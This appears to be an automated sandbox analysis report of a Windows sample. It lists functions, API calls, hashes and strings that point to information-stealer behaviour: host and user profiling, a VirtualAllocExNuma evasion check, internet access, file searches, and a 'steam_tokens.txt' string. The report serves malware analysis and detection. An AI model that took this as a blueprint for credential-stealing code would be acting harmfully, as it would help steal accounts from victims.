Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: b85692bac22c82b231da35019f52562fb51be652bf257b83cf11110e45d5589b
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: b85692bac22c82b231da35019f52562fb51be652bf257b83cf11110e45d5589b
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 407d6d1cd96ad1ff19db18d65c2d3d428ccd969b87d209fb948818273e0ae36b
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 407d6d1cd96ad1ff19db18d65c2d3d428ccd969b87d209fb948818273e0ae36b
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 4339b44bf44e1711b1606e82f21baa95871c3cb7deb69ab34985a9f8cf9ac5d6
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 4339b44bf44e1711b1606e82f21baa95871c3cb7deb69ab34985a9f8cf9ac5d6
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,042887E8), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042808A8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402130 Relevance: 56.5, Strings: 45, Instructions: 262COMMON

Download Yara Rule

Strings

5E7EJAIFWP5BZROLZO6W, xrefs: 00402261
2WP659GSYI7D, xrefs: 004024EB
K3094870IF45XN, xrefs: 004021B2
FV4H8MOSH, xrefs: 0040246E
CPB3S7O6, xrefs: 00402310
W86NKZ1TY, xrefs: 004023F1
539MPSJANSD, xrefs: 0040222F
1YQKUB5MHNMRC, xrefs: 004022AC
BA1006TG1QHMIPO3SP, xrefs: 0040227A
BNIEH7LB5LYH, xrefs: 00402455
GUBG99T30LIFE, xrefs: 00402487
HF0VSCFMUJG, xrefs: 00402374
4WIODFL1OMD, xrefs: 0040254F
KNPF4XBE4WD2I8QMAU1C, xrefs: 0040238D
/CQ$>a2&^, xrefs: 00402441
5J2",<, xrefs: 004024D7
F9QCBZ, xrefs: 004024D2
BGK1DSVXC, xrefs: 004022DE
97PBH04O66, xrefs: 0040240A
S2PBMHIA67, xrefs: 004021FD
BN51DT95, xrefs: 0040235B
F5SFSJBWSZ08ADT4T, xrefs: 00402342
OTAJOVG, xrefs: 0040251D
911BXOTQKBROSQT2, xrefs: 004022F7
45V4ZAWIL5D, xrefs: 00402293
)PF%4+`el6&-, xrefs: 004023DD
NFHT3JCV3KTA, xrefs: 004022C5
A75HROVJ2, xrefs: 0040243C
XT2HJB, xrefs: 00402504
/#6A0G6w, xrefs: 00402315
KT4UVD513AOOPS, xrefs: 00402329
0\_}ytU85, xrefs: 004023F6
SOQH1M1J, xrefs: 004021E4
M83VGAHGG0FCS0T, xrefs: 00402135
MUGWIADCOEIENRWC0F22, xrefs: 004023BF
